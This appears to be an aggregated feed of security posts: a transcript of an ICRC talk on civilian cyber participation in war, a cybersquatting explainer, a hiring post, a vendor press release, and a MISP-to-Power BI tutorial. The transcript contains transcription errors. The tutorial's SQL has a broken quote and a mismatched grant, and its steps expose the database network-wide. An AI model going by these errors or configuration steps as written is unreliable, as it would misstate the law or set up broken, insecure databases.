what does it mean? It means that we are far
from from the battlefield, but at the same

time, we are in the battlefield using digital
means. So this is a distance between what we

are leaving and what we are doing. So these
kinds of process is something that we are

still lacking nowadays, even after 30, 40
years, that we are using it and still lacking

of cognitive process. And this brings us to
the perception of anonymity where we are

running a DDoS attack using a VPN, we think
to be anonymous from our couch or we do this

and that.

Mauro Vignati:
So this is perpetrating the anonymity and
with this also the sense of impunity. We

Mauro Vignati:
think nobody will find me because I’m using
all the security measures that I can put in

Mauro Vignati:
place to not be seen.

Mauro Vignati:
So another is the performative nudging of the
state. What does it mean? Does it mean that

Mauro Vignati:
the the state, when is there enhancing and
modifying application? Is proportionately to

Mauro Vignati:
be gentle, pushing the civilians to adopt
this application that is already on their

Mauro Vignati:
phone to use this application for for war
reason so and these performative because as

Mauro Vignati:
soon as these new capacity is is put in in a
new application and push on the store and

Mauro Vignati:
then push on the phones is use very quick.

So this is performative so the speed of
integration we already said so this very fast

how to integrate civilians into the
battlefield. And then we have the involvement

of private companies that are doing the
normal business in peaceful time, that at

some point they find themselves into the
battlefield. And the third group of

consideration is are civilians and private
companies directly participating in

hostilities? So this is the most important
part are people that are doing this kind of

business, participating in hostilities. So we
see three communities characteristic to be

declared as participating in the cities.

Mauro Vignati:
So this is just a way to explain you how it
is. I am not saying that one scenario or the

Mauro Vignati:
other is direct participating in stating the
three scenarios that were seen before. We can

Mauro Vignati:
say that depending from case to case could be
considered as participating in hostilities.

Mauro Vignati:
But normally we should look at these three
cumulative aspects.

So one is the threshold of harm. So it means
that if you run, if you do this act, you

provide a you have an impact on the military
operation of a party to the conflict. So

there is a real impact of what you are doing.
The second one is the belligerent nexus is

knowing that if you have designed the act to
be to reach the threshold of harm.

So if there is a desire of designing this,
this act for providing this harm, and the

second the third one is that the direct
causation I mean, if we can know that from

the act that you are doing the the harm is
provided by your intervention.

So those are the three characteristics. So if
you are if you have this three characteristic

in the act that you are performing, you
probably participating in in a armed

conflict. So there are other characteristics
that we have to look at before saying that.

One of the other scenario is direct
participation in your city. What we are

saying is the temporary consideration for
such time.

Mauro Vignati:
So it does mean that so in our perspective,
ICRC perspective, if a civilian is opening an

Mauro Vignati:
application and taking a picture or doing a
DDOS attack and then closing the application,

Mauro Vignati:
only during that time a civilian could be and
say could be considering as participating in

Mauro Vignati:
hostilities as soon as you closed the
application is not is not more considered as

Mauro Vignati:
participating in stating some critics of our
will saying that this is too easy for

Mauro Vignati:
civilians to go in the battlefield and go out
from the battlefield. So a kind of a

Mauro Vignati:
revolving door, but again, case by case.

And then there is the territorial
consideration. Are you performing your act

from inside the battleground or from outside?
So are you doing this stuff from outside the

battlefield? So these are all the different
perspective that we’re going to check. After

all, what are the consequences of everything
here? So the first consequence, if you are so

directly participating, is that you are not
entitled to have the prisoner of war status

if you don’t have this title because you are
a civilian participating in hostilities. You

may lose immunity from domestic prosecution.
And I explain myself. So let’s imagine you

are attacking country with your means and at
some point the war is over and then some

years later you want to travel for for
vacation to this country. You could be

prosecuted in this country because you
participated in hostilities and then you have

no immunity for that.

Mauro Vignati:
So this means also that you lose protection
from attacks. And when we talk about attacks,

Mauro Vignati:
we is not just cyber attack, but also
physical attack. So someone that is

Mauro Vignati:
participating in society could lose the
protection from being attacked, although on a

Mauro Vignati:
physical on a physical way. So the
consequences for the states so states have

Mauro Vignati:
mandatory it’s mandatory for the state to
verify if one person that is participating to

Mauro Vignati:
a soldier is a combatant, is a civilian.

So distinguish what we said before, the the
principle of distinction for for the for the

states. The second one is the obligation of
cost and care. So this means that the states

have the obligation to help civilians to to
provide precaution to the civilians. But this

is absolutely in tension with the fact that
that states are nudging or pushing civilians

into the battlefield, how you can nudge and
push civilians on the battlefield. And the

same time, be sure to to provide cost and
care to the civilian.

The third one is that states have to respect
international humanitarian law. And the

reason are the law international human rights
law. So the right to life and such, such a

body of law that is fundamental. Also when we
talk about the territoriality of of the

battlefield. And so another consequence is
this time for the private companies is that

as the civilian is the possible loss of
protection from being attacked.

Mauro Vignati:
So even tech companies that are involved in
the battlefield, they could face this

Mauro Vignati:
situation if they are engaging in DPH for one
of the other party to the conflict.

Mauro Vignati:
And one very interesting point is that tech
and cybersecurity company property may become

Mauro Vignati:
a military objective. So let’s imagine you
have a platform for sharing intelligence with

Mauro Vignati:
the government body that this government is
involved in, in a in a in a in a war. And you

Mauro Vignati:
provide a cyber threat, intelligence to this
to this state through a platform. This

Mauro Vignati:
platform could become NSA could because
again, depend from case to case could become

Mauro Vignati:
a military objective of an army to the
conflict. So this platform could be disrupted

Mauro Vignati:
by one of the other parties to the conflict.

And so this brings us also to the territory
consideration that we have seen for

civilians. So it depends from my perspective,
from international maritime law, there is no

difference if you are doing this from inside
a battlefield territory or outside. But there

are other body of law, like human rights law,
that are taking in consideration territorial

territorial consideration for for this. And
technology and cybersecurity companies could

also be considered as an organized armed
group. Again here exception and case by case.

But it is possible that the tech companies
that is providing a defensive capability or

even active defensive capability could be
considered as organized armed group by to one

of the army, one of the ambit of the
conflict.

Mauro Vignati:
So these you can imagine the consequence of
being considered an organized group. These

Mauro Vignati:
bring us to the conclusion. So the first one
about the civilians. So I just put this point

Mauro Vignati:
civilian must be aware. So we’re not talking
anymore here on taking down a server of a

Mauro Vignati:
ransomware group or snitching to a C2 of a
state sponsor of an APT group.

Mauro Vignati:
So we are talking about participating in a
conflict. This is changing completely. The

Mauro Vignati:
situation where you are involved.

Mauro Vignati:
You have to be aware of what you’re doing
when you when you type on your keyboard and

Mauro Vignati:
be sure what you’re doing here, because you
can be attacked again with distinction in

Mauro Vignati:
case by case, but you can have a kinetic and
non-kinetic answer to what you’re doing.

The second conclusion is for the states. So
we stress the fact that the states have to

respect the principle of distinction between
civilians and combatants is very important

and is something that is is very worrisome
because we seen a fusion between the two

groups. And if you are really bringing
civilians into the battlefield, please

prioritize harmless form of civilian
involvement, like, I don’t know, rebuilding,

disrupt the connections or setting up servers
or whatever, not using civilians for the aim

of of of the war.

Mauro Vignati:
The third one is provide civilians the
information. So as soon as the state is

Mauro Vignati:
providing all the information to civilians
saying, hey, you can do this and that, if you

Mauro Vignati:
do the other, you take responsibility for
your act, At least the state. It could be

Mauro Vignati:
said that he provided all the information
useful for civilians to judge the situation.

Mauro Vignati:
Logically comply with their duties, so with
the natural and human rights law. So we said

Mauro Vignati:
before that we see a tension here between the
duty and the and what in reality is happening

Mauro Vignati:
and the obligation, of course, care.

We have talked before, so do not involve
civilians, had civilians against these

civilians of the battlefield and try to
reverse the civilian ization of the

battlefield. So this trend must be stopped
because we are seeing more and more tech

companies, more and more civilians into the
battlefield and latest for the companies. So

we think that companies need more awareness
in training in international humanitarian

law. So we had a discussion with several tech
companies and cybersecurity companies on this

topic and they open their eyes are where we
were not aware about this. So this is very

important that they start to have an
awareness in training and then prevent target

mistakes. So when you do offensive offensive
security or something like that, just be sure

if you shut down a command and control that
this command and control is a military

dedicated command and control is not a dual
use command and control that is used also for

civilian purposes and proactively inform as a
company what you are doing to avoid being

attacked.

Mauro Vignati:
So if you are doing protection or whatever,
just let the world know what you’re doing

Mauro Vignati:
during the conflict. And you should also
develop compliance in your companies and say,

Mauro Vignati:
Hey, how are we doing the right? How are we
now shifting to be a participant in the right

Mauro Vignati:
to a conflict or not?

So you have to be aware what you are doing
during this period and then try to lobby to

assure that civilian data should be protected
as civilian asset. So till now, the civilian

data do not have the same level of protection
as a civilian asset. So we advocate of

considering civilian data protected as
civilian asset, because when you disrupt

civilian, you can cause a very harmful
situation for civilians.

And most important stuff, we discuss all this
the other day with an attack against a

satellite infrastructure, try to do
segmentation of of the asset that you are

providing to a government. So if a government
wants to have an asset from your company, try

to split between civilian body of the
government and military body of the

government so that when there is a war
exploding and someone is trying to attack

those assets, is going to focus on the
military. One Thank you. One take question.

Speaker2:
Tomorrow. We have time for questions.
Quickly, quickly. Just get your hands.

Speaker3:
Hi there. Thanks. Really enjoyed the talk.
Just one kind of question. It seemed like an

Speaker3:
overarching theme in this is that there’s
sort of a dual use nature to all of this

Speaker3:
stuff that the you know, like you said, like
a cloud provider could be supporting a

Speaker3:
military, could also be supporting civilian
businesses. And from a defenders perspective,

Speaker3:
you know, threats, although they can be
nation state, they can be non nation state,

Speaker3:
whatever. You might just not care as a
defender and you just want to protect your

Speaker3:
own system. So I guess because that
distinction is hard on both sides, I think.

Speaker3:
Do you see any room or what specifically
would you see like on a maybe on a policy

Speaker3:
side or regulatory framework side that could
help clarify that and help like deal with

Speaker3:
these dual use technologies in a way that
helps distinguish civilian and military

Speaker3:
objectives?

Mauro Vignati:
I’m thinking about if you. Thank you for the
question and thinking about if you have a

Mauro Vignati:
contract with the government as from the
starting point, you have to define if there

Mauro Vignati:
is a military asset, is this a civilian
asset? So you have to be to be open with the

Mauro Vignati:
government and saying what the purpose of of
of our help here, what kind of infrastructure

Mauro Vignati:
are we securing? And then it’s up to you as a
company saying, I don’t want to protect a

Mauro Vignati:
military entity because in case of war, I’m
protecting something that can bring me to the

Mauro Vignati:
battlefield. So this is up to the company
having these these capability of distinguish

Mauro Vignati:
already from the beginning of of the contract
and being clear with the government what

Mauro Vignati:
they’re doing. One of the.

Speaker3:
One of the issues that you kind of have to
deal with in both hot and cyber conflicts

Speaker3:
might be mercenaries. So what are your
thoughts on kind of identifying private

Speaker3:
companies who might be affiliated with
governments?

Mauro Vignati:
That’s a good question. I mean, I chair
international maritime law does not prohibit

Mauro Vignati:
the participation in war. So this is up to an
up to everybody to know if they want to

Mauro Vignati:
participate to a war. I mean, but that you
have behaving in a in a manner that you are

Mauro Vignati:
not entitled to war crimes.

Mauro Vignati:
But from this point of view, you have to be
aware of the fact that if you are a mercenary

Mauro Vignati:
participating to a conflict, you can be
attacked afterward from one of the parties of

Mauro Vignati:
the conflict, even in kinetic ways. So we’re
talking about a kinetic reaction to a cyber

Mauro Vignati:
operation. So this is up to everyone to do
this. We we try to get in touch with those

Mauro Vignati:
mercenaries, with the groups of people that
are cooperating with the one of the other

Mauro Vignati:
party. Try to explain them. What are the
dangers bind into this, to this situation?

Mauro Vignati:
Just that they know what they what they are
facing. Thank you.

Mauro Vignati:
Yeah. We take one last.

Speaker2:
Not more. One more last one, quickly. Get.

Speaker2:
We have this man from Geneva all the way
here. We have to make all the use of its time

Speaker2:
as we can get.

Speaker3:
Go ahead with digital warfare, everyone.

Speaker3:
Or more and more people have equal access to
be a part of war.

Speaker3:
They don’t have to be in a military base.
They don’t have to grow up and go to boot

Speaker3:
camp. And I think as a people in general, we
have a desire to fight for something.

Speaker3:
So you talk about trying to stop this, the
civilian ization of warfare, but I think it’s

Speaker3:
the civilians that are that are wanting to be
a part of something. Could there be a benefit

Speaker3:
to having the states provide a way for the
civilians to actively defend their country,

Speaker3:
which might, you know, shoo them away from
trying to be offensive and potentially more

Speaker3:
damaging? And if so, is that even something
that’s realistic or possible for states to

Speaker3:
give their citizens a way to defend without
also creating a vulnerability for other

Speaker3:
countries to come in and know what’s not
defended or what needs to be fixed?

Mauro Vignati:
Yeah, I mean, I think it’s a it’s a human
being reaction if you want to take part of

Mauro Vignati:
not from one of the parts of the conflict. I
mean you feel engaged in something. But then

Mauro Vignati:
the other side, what we what I’m showing here
is with the digitalization way easier to get

Mauro Vignati:
into so and this is the lack of cognitive
process. So when you think I’m going to

Mauro Vignati:
participate, just open the laptop and doing
something right will be different. If you

Mauro Vignati:
have to go physically in the battlefield and
taking a gun and participating. So this is

Mauro Vignati:
the the war that is reframing you for doing
this. That’s why this is the problem of

Mauro Vignati:
civilization. So we’re bringing more and more
civilians into the company because the easy

Mauro Vignati:
with digital means and we have to think about
is, okay, it’s easy, but the consequences are

Mauro Vignati:
exactly the same as participating physically
into conflict. That’s the main message of of

Mauro Vignati:
the talk today is that. Thank you very much,
guys.

Speaker2:
Thank you.

Mario, thank you.

Sonix is the world’s most advanced automated transcription, translation, and subtitling platform. Fast, accurate, and affordable.

Automatically convert your mp4 files to text (txt file), Microsoft Word (docx file), and SubRip Subtitle (srt file) in minutes.

Sonix has many features that you’d love including automated subtitles, collaboration tools, secure transcription and file storage, share transcripts, and easily transcribe your Zoom meetings. Try Sonix for free today.

About the Presenter

Mauro Vignati currently holds the role of Advisor on Digital Technologies of Warfare for the International Committee of the Red Cross (ICRC). Having worked with the Swiss Federal Department of Defense, the National Cyber Security Centre (NCSC), and now the ICRC, Mauro brings nearly two decades’ worth of expertise on the prevention, identification, and analysis of advanced persistent threats (APTs), mainly from state-sponsored groups.

About LABScon

This presentation was featured live at LABScon 2022, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

What is Cybersquatting?

By: Dom Myers
9 November 2022 at 09:00

Cybersquatting is the act of registering a domain name which looks similar to a target domain in order to perform malicious activity. This includes facilitating phishing campaigns, attacking genuine visitors who mistyped an address, or damaging a brand’s reputation. This article will cover the dangers of cybersquatting, what companies can do about it, and outline a plan for a tool which can be used to detect potentially malicious domains.

Many phishing campaigns use generic domains such as discountoffers.com which can be used against any company under the guise of offering discounts or money back. This can then be expanded to use a subdomain such as acme.discountoffers.com to more precisely target a specific brand. However, other more targeted campaigns will use names similar to a legitimate one owned by the target in the hopes that a victim either won’t notice the misspelling or think that the domain is genuine. A real-world example of this was the case of Air France who own www.airfrance.com, as a cybersquatter registered www.arifrance.com and www.airfranceairlines.com to divert users to a website selling discount travel deals.

Companies spend huge amounts of money registering domains that are similar to their primary ones in an attempt to prevent them potentially being used maliciously in the future. Due to cost and logistics, it’s impossible to register every possible domain an attacker might take advantage of, and often by the time a company considers taking such a step, some domains have already been registered. In this latter case, as it’s too late for the company to register it themselves, the next best thing is to be aware of them so action can be taken accordingly.

Common Cybersquatting Techniques

There are several routes an attacker may take in order to choose a domain which is likely to be successful against their target. The following sections detail a few of the thought processes an attacker might go through when choosing a domain using “google.com” as the sample target.

Misspelling

This is when a cybercriminal registers a misspelled domain, and is often known as typosquatting. These types of domains would be where the attacker is hoping a user will accidentally type the target name wrong. Some of these would be based on substituting letters for ones which are next to it on the keyboard or characters typed in a slightly different order. Examples include:

  • googel.com
  • gogle.com
  • soogle.com

As shown below, Google has proactively registered some domains to protect their users and their trademark, redirecting them to the genuine website.

Misspelt domain redirecting to legitimate Google website

Similar looking

These are URLs which look similar to the target and although they could be mistyped by a user looking to visit the target domain, they could also be ones designed to not be typed by the victim. For example, to be used as a link in a phishing email where the attacker hopes the victim doesn’t notice due to its similarity. Techniques for this could include replacing letters with numbers, “i” with “L”, swapping letters around, etc. Examples include:

  • g00gle.com
  • googie.com
  • gooogle.com

Legitimate looking

Another potential technique is registering domains which don’t contain typos and aren’t designed to look like the target but a victim might think it genuine. This could include registering different top-level domains using the legitimate company name, or prepending/appending words to the target. Examples include:

  • googlesupport.com
  • google.net
  • google-discounts.com

What can I do if someone registers my domain?

So you have identified a list of similar domains to yours. You’ve investigated and found that one of the domains has mirrored your own website and is being used to launch phishing campaigns against your employees. What do you do now?

In the United States there are two avenues for legal action:

  • Internet Corporation of Assigned Names and Numbers (ICANN)
  • Anticybersquatting Consumer Protection Act (ACPA)

ICANN Procedure

ICANN has developed the Uniform Domain Name Dispute Resolution Policy (UDNDRP), to resolve disputes for domains which may potentially infringe on trademark claims. A person can bring an action by complaining that:

  • A domain name is identical or confusingly similar to a trademark or service mark in which the complainant has rights; and
  • The domain has no rights or legitimate interests in respect of the domain name; and
  • The domain name has been registered and is being used in bad faith.

If the action is successful, the domain will either be cancelled or transferred to you.

Legal Action Under the ACPA

The Anticybersquatting Consumer Protection Act (ACPA) was enacted in 1999 in order to combat cybersquatting such as the case described in this article. A trademark owner may bring an action against a squatter who:

  • Has a bad faith intent to profit from the trademark
  • Registers, traffics in, or uses a domain name that is
    • Identical or confusingly similar to a distinctive trademark
    • Identical or confusingly similar to or dilutive of a famous trademark
    • Is a protected trademark

A UDNDRP proceeding is generally the more advised course of action to take, as they tend to be faster and cheaper.

User awareness and technical solutions

As these proceedings can be time consuming (or if your business is based outside of the United States), more immediate measures can be taken to at least protect a client’s own internal users. Making employees aware of a new phishing site is one of the quickest and easiest steps that can be taken to help them stay on the lookout and reduce the chance of success for the attacker.

In addition to this, email policies can be set up to block incoming emails from these potential phishing domains so that they never reach employees in the first place. Some determined attackers may attempt to get round this by contacting employees via another medium such as telephone, coercing victims to visit their site manually via a web browser. In these cases, networking solutions may be able to help to prevent users from connecting to these malicious domains at all by blocking them at the firewall level.

Conclusion

Cybersquatting is threat which is often overlooked, and many companies either don’t consider protection until they’ve been affected by it, or believe it’s something they aren’t able to proactively defend against. Nettitude are aiming to assist clients further in this area by developing the tools to allow domains to be continuously monitored for potentially suspicious permutations.

The post What is Cybersquatting? appeared first on Nettitude Labs.

Recruiting Security Researchers Remotely

8 November 2022 at 23:00

At Doyensec, the application security engineer recruitment process is 100% remote. As the final step, we used to organize an onsite interview in Warsaw for candidates from Europe and in New York for candidates from the US. It was like that until 2020, when the Covid pandemic forced us to switch to a 100% remote recruitment model and hire people without meeting them in person.

Banner Recruiting Post

We have conducted recruitment interviews with candidates from over 25 countries. So how did we build a process that, on the one hand, is inclusive for people of different nationalities and cultures, and on the other hand, allows us to understand the technical skills of a given candidate?

The recruitment process below is the result of the experience gathered since 2018.

Introduction Call

Before we start the recruitment process of a given candidate, we want to get to know someone better. We want to understand their motivations for changing the workplace as well as what they want to do in the next few years. Doyensec only employs people with a specific mindset, so it is crucial for us to get to know someone before asking them to present their technical skills.

During our initial conversation, our HR specialist will tell a candidate more about the company, how we work, where our clients come from and the general principles of cooperation with us. We will also leave time for the candidate so that they can ask any questions they want.

What do we pay attention to during the introduction call?

  • Knowledge of the English language for applicants who are not native speakers
  • Professionalism - although people come from different cultures, professionalism is international
  • Professional experience that indicates the candidate has the background to be successful in the relevant role with us
  • General character traits that can tell us if someone will fit in well with our team

If the financial expectations of the candidate are in line with what we can offer and we feel good about the candidate, we will proceed to the first technical skills test.

Source Code Challenge

At Doyensec, we frequently deal with source code that is provided by our clients. We like to combine source code analysis with dynamic testing. We believe this combination will bring the highest ROI to our customers. This is why we require each candidate to be able to analyze application source code.

Our source code challenge is arranged such that, at the agreed time, we send an archive of source code to the candidate and ask them to find as many vulnerabilities as possible within 2 hours. They are also asked to prepare short descriptions of these vulnerabilities according to the instructions that we send along with the challenge. The aim of this assignment is to understand how well the candidate can analyze the source code and also how efficiently they can work under time pressure.

We do not reveal in advance what programming languages are in our tests, but they should expect the more popular ones. We don’t test on niche languages as our goal is to check if they are able to find vulnerabilities in real-world code, not to try to stump them with trivia or esoteric challenges.

We feel nothing beats real-world experience in coding and reviewing code for vulnerabilities. Beyond that, examples of the academic knowledge necessary to pass our code review challenge is similar (but not limited) to what you’d find in the following resources:

Technical Interview

After analyzing the results of the first challenge, we decide whether to invite the candidate to the first technical interview. The interview is usually conducted by our Consulting Director or one of the more experienced consultants.

The interview will last about 45 minutes where we will ask questions that will help us understand the candidates’ skillsets and determine their level of seniority. During this conversation, we will also ask about mistakes made during the source code challenge. We want to understand why someone may have reported a vulnerability when it is not there or perhaps why someone missed a particular, easy to detect vulnerability.

We also encourage candidates to ask questions about how we work, what tools and techniques we use and anything else that may interest the candidate.

The knowledge necessary to be successful in this phase of the process comes from real-world experience, coupled with academic knowledge from sources such as these:

Web Challenge

At four hours in length, our Web Challenge is our last and longest test of technical skills. At an agreed upon time, we send the candidate a link to a web application that contains a certain number of vulnerabilities and the candidate’s task is to find as many vulnerabilities as possible and prepare a simplified report. Unlike the previous technical challenge where we checked the ability to read the source code, this is a 100% blackbox test.

We recommend candidates to feel comfortable with topics similar to those covered at the Portswigger Web Security Academy, or the training/CTFs available through sites such as HackerOne, prior attempting this challenge.

If the candidate passes this stage of the recruitment process, they will only have one last stage, an interview with the founders of the company.

Final Interview

The last stage of recruitment isn’t so much an interview but rather, more of a summary of the entire process. We want to talk to the candidate about their strengths, better understand their technical weaknesses and any mistakes they made during the previous steps in the process. In particular, we always like to distinguish errors that come from the lack of knowledge versus the result of time pressure. It’s a very positive sign when candidates who reach this stage have reflected upon the process and taken steps to improve in any areas they felt less comfortable with.

The last interview is always carried out by one of the founders of the company, so it’s a great opportunity to learn more about Doyensec. If someone reaches this stage of the recruitment process, it is highly likely that our company will make them an offer. Our offers are based on their expectations as well as what value they bring to the organization. The entire recruitment process is meant to guarantee that the employee will be satisfied with the work and meet the high standards Doyensec has for its team.

The entire recruitment process takes about 8 hours of actual time, which is only one working day, total. So, if the candidate is reactive, the entire recruitment process can usually be completed in about 2 weeks or less.

If you are looking for more information about working @Doyensec, visit our career page and check out our job openings.

Summary Recruiting Process

NVISO EXCELS IN MITRE ATT&CK® MANAGED SERVICES EVALUATION

9 November 2022 at 14:13

As one of the only EU-based Cyber Security companies, NVISO successfully participated in a first-of-its-kind, MITRE-led, evaluation of Managed Security Services (MSS).

MITRE Evaluation Graphic


The inaugural MITRE Engenuity ATT&CK® Evaluations for Managed Security Services ran in June 2022 and its results have been published today. NVISO performed excellently in the evaluation, demonstrating services that are at or above the level of traditional titans of the industry.


During this evaluation, NVISO was tested on its ability to detect and report advanced attacks that were executed by the MITRE team.

“The tests were simulating real-life scenarios in which only detection and reporting was evaluated – we were not allowed to block or respond to any attacks”, says Erik Van Buggenhout, Partner, responsible for Managed Security Services at NVISO. A test environment was set up in which participants would deploy their tools and detection services.

“NVISO chose to deploy Palo Alto’s Cortex XDR – an XDR tool that integrates seamlessly into our service and client environments. The combination of XDR with our NITRO automation platform and NVISO world-class expertise ensures that our Managed Detection and Response service is top notch and future-proof. While we have always believed in our own strategy, we are excited and proud to receive MITRE’s external and independent validation of the outstanding quality of our services.”, Erik says.

NVISO was one of the only EU-based Cyber Security companies participating in this elite evaluation. “NVISO is a true European Cyber Security company, which is reflected well in its mission: to safeguard the foundations of European society from cyber attacks”, says Maxim Deweerdt, head of MSS presales at NVISO.

NVISO was founded in 2013 in Belgium, has since offered services to large and mid-sized customers in almost 20 countries, mostly in Europe. NVISO has offices in Brussels, Frankfurt, Munich, Vienna and Athens. “The way NVISO approaches Managed Detection and Response is typical for our company: we challenge the status-quo and provide an innovative approach driven by our expertise and long experience in cyber defense”, Maxim says, “This evaluation has highlighted and validated our approach, and confirms the positive feedback we receive from customers”.


More information about the evaluation and NVISO’s services can be found here: https://mitre.nviso.eu

About MITRE

MITRE Engenuity is a US nonprofit organization launched in 2019 “to collaborate with the private sector on solving industry-wide problems with cyber defense” in collaboration with corporate partners. They are most known in the Cyber Security world for their work on the ATT&CK® framework, which is a global knowledge base of threat activity, techniques and models. ATT&CK® framework is used by almost every vendor and provider in the Cyber Defense industry.

www.mitre-engenuity.org

About NVISO

NVISO is a pure-play Cyber Security company founded in 2013 in Brussels by 5 ex-Big four managers. They always had an itch to do things differently (and better), decided to start their own company and with a strong mission: to safeguard the foundations of European society from cyber attacks. NVISO currently employs about 200 people and has offices in Brussels, Frankfurt, Munich, Vienna and Athens. NVISO is rapidly expanding into other countries and has an aggressive growth strategy for the next years. NVISO has customers in 20+ countries, primarily the Finance, Government, Defense, and Technology sectors.

www.nviso.eu



Visualizing MISP Threat Intelligence in Power BI – An NVISO TI Tutorial

9 November 2022 at 13:42
MISP Power BI Dashboard

Problem Statement

Picture this. You are standing up your shiny new MISP instance to start to fulfill some of the primary intelligence requirements that you gathered via interviews with various stakeholders around the company. You get to some requirements that are looking for information to be captured in a visualization, preferably in an automated and constantly updating dashboard that the stakeholder can look into at their leisure.

Well MISP was not really made for that. There is the MISP-Dashboard repo but that is not quite what we need. Since we want to share the information and combine it with other data sources and make custom visualizations we need something more flexible and linked to other services and applications the organization uses. Also it looks as if other stakeholders would like to compare and contrast their datasets with that of the TI program. Then you think, it would be nice to be able to display all the work that we put into populating the MISP instance and show value over time. How the heck are we going to solve all of these problems with one solution which doesn’t cost a fortune???

Links to review:

CTIS-2022 Conference talk – MISP to PowerBI: https://youtu.be/0i7_gn1DfJU
MISP-Dashboard powered by ZMQ: https://github.com/MISP/misp-dashboard

Proposed Solution

Enter this idea = “Making your data (and yourself/your team) look amazing with Power BI!”

In this blog we will explain how to use the functionality of Power BI to accomplish all of these requirements. Along the way you will probably come up with other ideas around data analytics that go beyond just the TI data in your MISP instance. Having all this data in a platform that allows you to slice and dice it without messing with the original source is truly game changing.

What is MISP???

If you do not know what MISP is, I prepped this small section.

MISP is a Threat Intelligence Sharing Platform that is now community driven. You can read more about its history here: https://www.misp-project.org/

In a nutshell, MISP is a platform that allows you to capture, generate, and share threat intelligence in a structured way. It also helps control access to the data that the user and organization is supposed to be able to access. It uses MariaDB as its back-end database. MariaDB is a fork of MySQL. This makes it a prime candidate for using Power BI to analyze the data.

What is Power BI???

Power BI is a set of products and services offered by Microsoft to enable users to centralize Business Intelligence (BI) data with all the tools to analyze and visualize it. Other applications and services that are similar to Power BI are Tableau, MicroStrategy, etc.

Power BI Desktop

  • Desktop application
  • Complete data analysis solution
  • Includes Power Query Editor (ETLs)
  • Can upload data and reports to the Power BI service
  • Can share reports and templates manually with other Power BI Desktop users
  • Free (as in beer), runs on modern Windows systems

Power BI Service

  • Cloud solution
  • Can link visuals in reports to dashboards (scheduled data syncs)
  • Used for collaboration and sharing
  • Limited data modelling capabilities
  • Not Free (Pro license level included with Microsoft E5 license, per individual licenses available as well)

Links to Pricing

More information here: https://docs.microsoft.com/en-gb/power-bi/fundamentals/power-bi-overview and https://powerbi.microsoft.com/en-au/pricing/

Making the MISP MariaDB accessible to Power BI Desktop

MISP uses MariaDB which is a fork of MySQL. These terms are used interchangeably during this blog. You can use MariaDB or MySQL on the command line. I will use MySQL in this blog for conciseness.

Adding a Power BI user to MariaDB

When creating your MISP instance, you create a root user for the MariaDB service. Log in with that user to create a new user that can read the MISP database.

mysql -u root -p
# List users
SELECT User, Host FROM mysql.user;
# Create new user
CREATE USER 'powerbi'@'%' IDENTIFIED BY '<insert_strong_password';
GRANT SELECT on *.* to 'powerbi'@'';
FLUSH PRIVILEGES;
# List users again to verify
SELECT User, Host FROM mysql.user;
# Close mysql terminal
exit

Configuring MariaDB to Listen on External Interface

We need to make the database service accessible outside of the MISP instance. By default it listens only on 127.0.0.1

sudo netstat -tunlp
# You should see that mysqld is listening on 127.0.0.1:3306

# Running the command below is helpful if you do not know what locations are being read for configuration information by mysql
mysql --help | grep "Default options" -A 1

# Open the MariaDB config file below as it is the one that is being used by default in normal MISP installs.
sudo vim /etc/mysql/mariadb.conf.d/50-server.cnf

# I will not go into how to use vim as you can use the text editor of your choice. (There are strong feelings here....)
# Add the following lines in the [mysqld] section:

skip-networking=0
skip-bind-address

# Comment out the bind-address line with a # 
#bind-address

# Should look like this when you are done: #bind-address            = 127.0.0.1
# Then save the file

# Restart the MariaDB service
sudo service mysql restart

# List all the listening services again to validate our changes. 
sudo netstat -tunlp
# You should see the mysqld service now listening on 0.0.0.0:3306

Optional: Setup Firewall Rules to Control Access (recommended)

To maintain security we can add host-based firewall rules to ensure only our selected IPs or network ranges are allowed to connect to this service. If you are in a local environment, behind a VPN, etc., then this step might not be necessary. Below is a quick command to enable UFW on Ubuntu and allow all the ports needed for MISP, MySQL, and for maintenance via SSH.

# Switch to root for simplicity
sudo su -

# Show current status
ufw status

# Set default rules
ufw default deny incoming
ufw default allow outgoing

# Add your trusted network range or specific IPs for the ports below. If there are additional services you need to allow connections to you can add them in the same manner. Example would be SNMP. Also if you are using an alternate port for SSH, make sure you update that below or you will be cut off from your server. 
ufw allow from 10.0.0.0/8 to any port 22,80,443,3306 proto tcp

# Show new rules listed by number
ufw status numbered

# Start the firewall
ufw enable

For more information on UFW, I suggest the Digital Ocean tutorials.

You can find a good one here: https://www.digitalocean.com/community/tutorials/how-to-set-up-a-firewall-with-ufw-on-ubuntu-20-04

Testing Access from Remote System with MySQL Workbench

Having a tool to test and work with MySQL databases is crucial for testing in my opinion. I use the official “MySQL Workbench” that can be found at the link below:
https://dev.mysql.com/downloads/workbench/

You can follow the documentation here on how to use the tool and create a connection: https://dev.mysql.com/doc/workbench/en/wb-mysql-connections-new.html

Newer versions of the Workbench try to enforce connections to databases over SSL/TLS for security reasons. By default, the database connection in use by MISP does not have encryption configured. It is also out of the scope of this article to set this up. To get around this, you can add useSSL=0 to the “Others” text box in the Advanced tab of the connection entry for your MISP server. When you test the connection, you will receive a pop-up warning about incompatibility. Proceed and you should have a successful test.

MySql Workbench Settings

Once the test is complete, close the create connection dialog. You can then click on the connection block in Workbench and you should be shown a screen similar to the one below. If so, congratulations! You have setup your MISP instance database to be queried remotely.

MySQL Workbench Data Example

Installing Power BI Desktop and MySQL Drivers

Oracle MySQL Connector

For Power BI Desktop to connect to the MySQL server you will need to install a “connector” which tells Power BI how to communicate with the database. Information on this process is found here: https://docs.microsoft.com/en-us/power-query/connectors/mysqldatabase
The “connector” itself can be downloaded from here: https://dev.mysql.com/downloads/connector/net/

You will have to create a free Oracle account to be able to download the software.

Test Access from Power BI Desktop to MISP MariaDB

Once installed, you will be able to select MySQL from the “Get data” button in the ribbon in the Data section of the Home tab. (Or the splash screen that pops up each time you load Power BI Desktop, hate that thing. I swear I have unchecked the “Show this screen on startup” but it doesn’t care. I digress.)

Do not get distracted by the amount of datatypes you can connect to Power BI. This is where the nerd rabbit hole begins. FOCUS!

  1. Click on Get data
  2. Click on More…
  3. Wait for it to load
  4. Type “MySQL” in the search box
  5. Select MySQL database from the panel to the right
  6. Click Connect
Selecting Data Type
  1. Setup IP address and port in the Server field for your MISP instance
  2. Type misp in the Database field
  3. Click OK
Configure MISP Connection Information
  1. Select Database for the credential type
  2. Enter the user we created and the password
  3. Select the database level in the “Select which level to apply these settings to” drop-down menu
  4. Click Connect
Connecting to the MISP MariaDB Service

View your data in all its glory!

